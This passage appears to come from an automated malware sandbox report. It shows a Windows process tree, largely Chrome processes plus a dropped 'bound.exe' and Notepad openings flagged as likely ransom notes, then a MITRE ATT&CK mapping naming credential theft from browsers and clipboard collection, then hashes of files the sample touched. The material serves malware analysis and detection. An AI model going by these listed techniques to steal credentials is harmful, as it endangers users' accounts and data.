  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5088,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5564 /prefetch:1
  2⤵
  PID:5012
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5788,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5780 /prefetch:1
  2⤵
  PID:2552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=4964,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3392 /prefetch:1
  2⤵
  PID:4332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3252,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5100 /prefetch:1
  2⤵
  PID:1572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5448,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4900 /prefetch:1
  2⤵
  PID:1312
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5796,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5188 /prefetch:1
  2⤵
  PID:4028
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=3300,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5172 /prefetch:1
  2⤵
  PID:1664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=3216,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5184 /prefetch:1
  2⤵
  PID:3616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=4716,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5164 /prefetch:1
  2⤵
  PID:3104
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=3332,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5476 /prefetch:1
  2⤵
  PID:2576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=3204,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4452 /prefetch:1
  2⤵
  PID:5076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=5220,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:1
  2⤵
  PID:2884
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=5504,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:1
  2⤵
  PID:2292
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=4640,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4624 /prefetch:1
  2⤵
  PID:5040
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=5740,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3412 /prefetch:1
  2⤵
  PID:2360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4856,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5432 /prefetch:8
  2⤵
  PID:3132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=4876,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5344 /prefetch:1
  2⤵
  PID:924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5680,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=864 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=5816,i,17312269568890345110,10463877526706399582,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3440 /prefetch:1
  2⤵
  PID:2856

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4604

C:\Users\Admin\AppData\Local\Temp\bound.exe
"C:\Users\Admin\AppData\Local\Temp\bound.exe"
1⤵
- Executes dropped EXE
PID:2276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:1636

C:\Users\Admin\AppData\Local\Temp\bound.exe
"C:\Users\Admin\AppData\Local\Temp\bound.exe"
1⤵
- Executes dropped EXE
PID:4416

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\BroadcastMsg_1728293289.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:4392

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI3C8F.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:4268

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\dd_vcredistMSI3CB0.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:4252

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\dd_vcredistUI3C8F.txt
1⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:5020

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
f49b18578d7e5ee6eb8f54130c77c0f9

SHA1
b22097986f01d34f0eb35ae4be3c68476c526e97

SHA256
794971c2c4d652737f4df62682f2d6b473f4fce91943eac935b238b192d77dc6

SHA512
a4306444b1a1211a3e61bcf510982ee8f454d72f1da910605dc238996fc40de843d5be60a25240e8c3fa7e7f851553bed84678f5b23631753eeaf93eab4090bc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005

Filesize
215KB

MD5
d79b35ccf8e6af6714eb612714349097

SHA1
eb3ccc9ed29830df42f3fd129951cb8b791aaf98

SHA256
c8459799169b81fdab64d028a9ebb058ea2d0ad5feb33a11f6a45a54a5ccc365

SHA512
f4be1c1e192a700139d7cff5059af81c0234ed5f032796036a1a4879b032ce4eedd16a121bbf776f17bc84a0012846f467ad48b46db4008841c25b779c7d8f5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000009

Filesize
90KB

MD5
48743a670fa866d07b162f046726b2ec

SHA1
5f180be674c56c4519f531f0796b5b958c20127c

SHA256
9d436fc2f3d4ec40a0e3ae981b315036ac944d2347995d37c27b059db59ce966

SHA512
cbeb13a3ab5e6cd811bc64a14304f389d56de091db12618d62fc223de96e686545393eda1fde83ffea24468ff77953054b25a4a7a87ae2d9f61283c3ec46f69f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a

Filesize
82KB

MD5
c523a87419a14278aa77842f59bf2043

SHA1
723c730164bd8dd452873848420ef5a55ca0a443

SHA256
e0cfd99765fb698799120f210ab984956523f76b3bc6793a54b9207449472706

SHA512
7df2fbcdfabb76348981eb1a11b43a28a2a43b31d841136e13c87a46f3f6c87e4be3560fc098cb36cdc3be8fca8a8f6831ab3901fb36a2457886b2785fa4a649

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b

Filesize
121KB

MD5
fb813d59921301fa3f47ca273db2652a

SHA1
c7512e18aefa21f58e28dd0f80f4272f1a2a8511

SHA256
2184e8d2e0fd38606ed6dcadd2e7302cf9aa62370bae00217c9dc3f16ad12038

SHA512
6a8f304957da75966e10d08d34178af7ac123d59ae73b0fd64fd1d9021f4f88ef2b21b2d40af832eb6331151acbe876e0d81be5d205c949b342daaa0fc543b4b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000d

Filesize
1.6MB

MD5
6e74f1878c8a5ae0362fd337ea5634ff

SHA1
194aa2983ff2e8cc216a0d269d160cd590e1d34c

SHA256
88de1472634918c8d1cba9b5f70da9b79fbda71aef8dfa59f34ef493b91e9a08

SHA512
2485f1a9804e8cb63af2408df7223e07cd24ffcebda18b06f0e2d466679c9b381cea552a58fb28a8c917a550f62c331bdb38f1dd595a3dd5afa90dbdbc9dabf0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000f

Filesize
20KB

MD5
87e8230a9ca3f0c5ccfa56f70276e2f2

SHA1
eb116c8fd20cb2f85b7a942c7dae3b0ed6d27fe7

SHA256
e18d7214e7d3d47d913c0436f5308b9296ca3c6cd34059bf9cbf03126bafafe9

SHA512
37690a81a9e48b157298080746aa94289a4c721c762b826329e70b41ba475bb0261d048f9ab8e7301e43305c5ebf53246c20da8cd001130bf156e8b3bd38b9b8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000010

Filesize
78KB

MD5
35a46116980c974751122a331d47fd84

SHA1
cd6e9014e38596c681641a27706124b5b69f86fc

SHA256
ccab92b9bfa43457f743cd83e454bcc63a768deb352fbad2d06d718eb2815a66

SHA512
aa4f484d3ca65525d5613243797d7e025e552dbd4e68bd9887d88d32fc6928c13dd7a47e8f97c77436924478d451445fa121d1bc1958a0ba94a2a05159345048

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000011

Filesize
123KB

MD5
a9fec133fcd6cfaf435bc27c7abc23be

SHA1
d486bae70d09b670e7d308fa0ed7e448783f1c4d

SHA256
8a74c491a60b8064ac0b7dda2e0acf8c5a429a348a074a63c86879fe243ba02b

SHA512
09d0199524a238b2d9ca9822efb710ab2eb45bfabf445ebea6f62cc608a8d11eb737eaccdea1d1c30d3e15a751eee545ff11b23d580044e4976f13c7a7ed4b53

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000012

Filesize
41KB

MD5
ca9e4686e278b752e1dec522d6830b1f

SHA1
1129a37b84ee4708492f51323c90804bb0dfed64

SHA256
b36086821f07e11041fc44b05d2cafe3fb756633e72b07da453c28bd4735ed26

SHA512
600e5d6e1df68423976b1dcfa99e56cb8b8f5cd008d52482fefb086546256a9822025d75f5b286996b19ee1c7cd254f476abf4de0cf8c6205d9f7d5e49b80671

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000014

Filesize
125KB

MD5
53436aca8627a49f4deaaa44dc9e3c05

SHA1
0bc0c675480d94ec7e8609dda6227f88c5d08d2c

SHA256
8265f64786397d6b832d1ca0aafdf149ad84e72759fffa9f7272e91a0fb015d1

SHA512
6655e0426eb0c78a7cb4d4216a3af7a6edd50aba8c92316608b1f79b8fc15f895cba9314beb7a35400228786e2a78a33e8c03322da04e0da94c2f109241547e8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000015

Filesize
21KB

MD5
e905a9be581b8c837c48020af6c606a0

SHA1
e00c1833f1c65b812094c149b314800350f54685

SHA256
58180e3cba5a736e1875c690b3a756dabc7ee19960f4c66a692d42e5679c13d0

SHA512
bcaf31fab00b69fc58aef04efc77c1e3786cd46e294b67ae862eb6e9d29fa4515e884ba6e105907d1e50593ad8220ddcda428125cae5118383a9bb6ceae2549b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000016

Filesize
36KB

MD5
5bc2d587fff8dd5375f23085abc58d2c

SHA1
01aeb26f2ae1bf6dd7f900deae1b7bccc26e8ff5

SHA256
7e1409fe9ba3597bcd67d1aae704cb59fb09bee820770e965cefb575c60fcedf

SHA512
9760633ccd0576df82515f7ea9403eb1f395a95a0f6890cc0874f3f759240071e29c446b98e008aa9b5d76ee9e66b3d51902bb0a8bdb09e44ef2c5dcfaa18dca

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000018

Filesize
33KB

MD5
f20d8515feed73a8b92424c2b9c67a6c

SHA1
01642c9b975538b3b219d95adde840c09a40e7d9

SHA256
fc6bfc6de25f96e31c0fa01b6c746ef9035900e6a0a1bbde6477617310d41a19

SHA512
5334172621bb287b692617365a83d5135c6fb258dba24581dce0dfbad7a237830635981b5aa8409ddac4d1284a09e8c22c022d371a7f7bc0572c7f6f04b92fa5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000019

Filesize
43KB

MD5
26872cad5fdc35371bcf1e052cd175b7

SHA1
b19d5fb308c025edd94d215bcfa1cf462ddd7d54

SHA256
77fbf3c11b622d1f4912d43c7dd326da5c55d1fdc385fbae2f920a7449bdc8e8

SHA512
f175e18128d4b35f2943d0ff61d77538c324fa1c5628ab76a3ec7ab30f1a67ed1d820cf63fea82d58170493e2a0fa11cd75ffbdfef339e15e068a5005ee67d40

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001a

Filesize
16KB

MD5
606f63ecf622ea330112a4e0b574598f

SHA1
392bc3e4f705112317608d33b137867b408fb32e

SHA256
d1e0de9181215978c3a4063c40aeca45fddb67b6eceeb1e159cc1f8da06eeca3

SHA512
0ac018b364cf79404dbba1e9b4f712d71eae97b0330d6bbdad4ad31ac41ea86f42c9eae9ef2ecbec31098199ef0cf72d86d511e75aa183658afba05f870c672a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001b

Filesize
114KB

MD5
dedbc9e9a1858b99bfb22cbefa013431

SHA1
e08ec71255ea8c6483f8759822161978fd05442c

SHA256
9ae82d405a21c8f7f1607f3265bc4ea03e9adb71258648b8ebeefb848fa247eb

SHA512
42fd2c929fad4ff24241b31964b016613540793d86c7b0f488078958c7597c78c07928d3050354f1c35e034899bef2df166229310786b8691c456cb6ee07df08

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\549cb9e6ab69f53f_0

Filesize
293B

MD5
896fc8183138874ecce5e3e1abbcd062

SHA1
44a6613b042ad66fec9a4304fa82a4aa668aa7fd

SHA256
824423b9935b50df5ad48f581c39057590c6bb730052eac68ebde605657cb7d4

SHA512
7a3177d3920ac2f3f3498df2d06329e18d3ba65d9c16624a6ae0547c74ee4817c1a3c2aff9be44693d21a12ebeffbca0f1b7d0e14d7608fb3883f8382cc8912c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\8da5caabfcf2b3d7_0

Filesize
463KB

MD5
c380609b10b12799b0741d356b2197a2

SHA1
9b3c25fc6946013676fe3b1a8f18e0c665902029

SHA256
e67258885f89529c1f435e1d7da34c1544a417c13ee4e2a31d93fcd55e53fe2a

SHA512
3ac13d2668281cfa4224cc722aa3b07c35983b9774edf0a026f9cb0e6915ed165d8113c395fd01483f9abe526bd06c3bf4b961f1582d4d43a18f399e2284b4a2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
7aa4cfb6cc30dbadca3b1fba85c51d05

SHA1
737cb078672cbfff8eb32183001f7daec40e3a99

SHA256
5c1bdc86bce7bac2f541dc7437f4e1b7bf2cb15d5f445d0f7077dae4afee4738

SHA512
4cf9c8970e02dddbdabc035a3a79692e5efc59b2ec8768f3d6a24d3d84792b0f4a8625a8438cfdc08133b8858ec44684e6d05291d930185cab1397319a0f361b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
3023d8bc89dbac62ece3fc6fb02e7f61

SHA1
7672a8c174ce5b8c4d786f7fca9305a62086e0a8

SHA256
edc96a3c8fab7482e5a449f98d011e520a2189a7489b8659245653c729e29894

SHA512
c499f0aa0383c70ebd8bbe1c74e2041692bcaf11b10cbfec3a0031038c6f6966943c3aebe94d808d3803cacd50af27e9dad6eb07b82d5115830ce4cb96d0d7c0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
8c6dabf61b413772fd9ba587f726282d

SHA1
f02a0bd9bd8630f48fd42ac18e0b89a18cc7965e

SHA256
a7bff4b3a50da68612bdc6425830f65cbdf8ee6d81b23e592d01716f9039c04b

SHA512
b110276b5e0ae87c473871640713df658cc05075f87715e4db0ac796ab588fe8d8c98a5575fc797283f89ef10f786f315a73650c7789f659da558cba23ba4f10

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\_locales\en\messages.json

Filesize
851B

MD5
07ffbe5f24ca348723ff8c6c488abfb8

SHA1
6dc2851e39b2ee38f88cf5c35a90171dbea5b690

SHA256
6895648577286002f1dc9c3366f558484eb7020d52bbf64a296406e61d09599c

SHA512
7ed2c8db851a84f614d5daf1d5fe633bd70301fd7ff8a6723430f05f642ceb3b1ad0a40de65b224661c782ffcec69d996ebe3e5bb6b2f478181e9a07d8cd41f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.85.1_0\dasherSettingSchema.json

Filesize
854B

MD5
4ec1df2da46182103d2ffc3b92d20ca5

SHA1
fb9d1ba3710cf31a87165317c6edc110e98994ce

SHA256
6c69ce0fe6fab14f1990a320d704fee362c175c00eb6c9224aa6f41108918ca6

SHA512
939d81e6a82b10ff73a35c931052d8d53d42d915e526665079eeb4820df4d70f1c6aebab70b59519a0014a48514833fefd687d5a3ed1b06482223a168292105d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.virustotal.com_0.indexeddb.leveldb\000003.log

Filesize
52KB

MD5
403e7fff4817c23109d6a1aa594960ab

SHA1
3e990e726598853623bb704bbec00bcea416a5fa

SHA256
a35631959a1310ae714cbb4dcd2626de9850b21bf1445126efea0f1fcaa93e5f

SHA512
9d16ada92069423cd46c97975a48292743942e6cda3342cb2500f7b6464e38102f06f023e045a653db80044dee79d52d62155ea764fb8e4782ef2daff3494262

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.virustotal.com_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.virustotal.com_0.indexeddb.leveldb\LOG

Filesize
357B

MD5
aec677621c61570ca8fa99653e5ab21f

SHA1
9e1994e62143b01ecdc9d7e0b827dc7e4f77be23

SHA256
a19e4f7b879f4962dc49d7b5926fb3f2fdb0a94f6784beb60cfdff9048846312

SHA512
78efe9d5002f6bff22cd6f09fb17abacb7d4baba3285d2e8dd9ce79679c490ccaf48e6d500dcd8d86b638636a896ba47cf911a7fb53a4afe6b22782c9244e914

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_www.virustotal.com_0.indexeddb.leveldb\MANIFEST-000001

Filesize
23B

MD5
3fd11ff447c1ee23538dc4d9724427a3

SHA1
1335e6f71cc4e3cf7025233523b4760f8893e9c9

SHA256
720a78803b84cbcc8eb204d5cf8ea6ee2f693be0ab2124ddf2b81455de02a3ed

SHA512
10a3bd3813014eb6f8c2993182e1fa382d745372f8921519e1d25f70d76f08640e84cb8d0b554ccd329a6b4e6de6872328650fefa91f98c3c0cfc204899ee824

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
7KB

MD5
4e63b71a20669dcc579ad7cb1db40f43

SHA1
a0d47de2882ac10caea9e2e49ff6875f782fc300

SHA256
509ad4af451ff9ec572f5d03fb5922d44a4816486aba3c13984431edf805191a

SHA512
5dcb083922b7d764ca46c484992d2d7affe2da8735e5eacfa4d32b26f744c90e5dd66336f1ca49797b6be94e4f6d30c6ba181c744ee62278fd52e6d6ef474295

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
6KB

MD5
3f9d5092ea7d37ca1d69e2d6d8e92df5

SHA1
d7645189e296311b5a8cf5f231dee2980dc9f209

SHA256
0d6588a1a6fae839b82bd53e82058ace57b2f4ec2bd617786e0a6d167a2a66c6

SHA512
5a7fa04b682193ac0921065a375b9c583ed37e973343fe311d0c0526bddaeaa733b182c730662428c75d2dc2e32f5199a1aa71f0db7ab05d1ee6181850934d8d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
7KB

MD5
75aeaa0ad12b8ac3542e7ba63bf8020f

SHA1
ca6e7ea32db2070672249d37fed97a8208f3474d

SHA256
a2a80df586256173cec2fadec9fe892a583c53deb8492a0361bda7d9ee3fea2f

SHA512
b3bf4a1315ce547cb66a20dc49d30c0828cfb359177bf1f62d2b9592859034c3b30370b16319ba05cfbc355c5254a6ea870456c9495a206aa1152fef69048a5a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
354B

MD5
1827a4efcfca66864206f89ca16b5bed

SHA1
3717b06af32422e7382e51c01bf31e82cf1a7350

SHA256
7cf732dd7c7beab8cc6346240aac7de7dc5018898880081479e07fbba241d09d

SHA512
2469663165c25f41b078207d1aaef39d9db15307d2fe79ea07dce00370c4ada9033b56f7ba49da4774a012b8902373eacfb716aeb38092eea530d07bc5aafbcb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
850B

MD5
9d152d39e5148143ea9eab439a2aa556

SHA1
ac95546634e8f5dec303227a0d0046aa24512d4e

SHA256
cdc994ffffe9f0b185e0d130c46ba3564143a806ef71a7f86e724563d2a09a32

SHA512
2a903e6545c4d0d5c73cdaa484d0fa42c86b8e65ec73f132cc124d35cb2b750d02fc99a9a9ed0bcf2a8756b28c909df82b2d53adca09e48795796df8d4e0cb6b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
354B

MD5
f81785c37c2e909cae1dcbc8b075b079

SHA1
0b4453dc3175b0eea9f2a33a441779c011b8bd82

SHA256
fc80bf976d54f667286128d13b7ffeb8789246343e3c01e7ed607b40554a3779

SHA512
a1c37be2786eb01a152a4c26e89b088db4467e0b3f2b6d8b54d5eb87fb0dfbbd7e8fd225e0da50bec50ad040ff159339c7ba42c0984ae5f0514157b9dd60f75b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
fb4e58212d49bbf378c81812b317f0c4

SHA1
d882af1a56c9ca5c885b42be0980a95ebb05e090

SHA256
d0934013631076aaa420140b25c71c962b54f0e6ec1880510d2d7338b7fee225

SHA512
bfa16e202d91874ecad743f3f45b468095dccda7e980e0001c6f49f6731d4f6273092bb0214da39ab9b0937120f97848844bdaf69c3299a331f5e9f4b53d6895

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
10KB

MD5
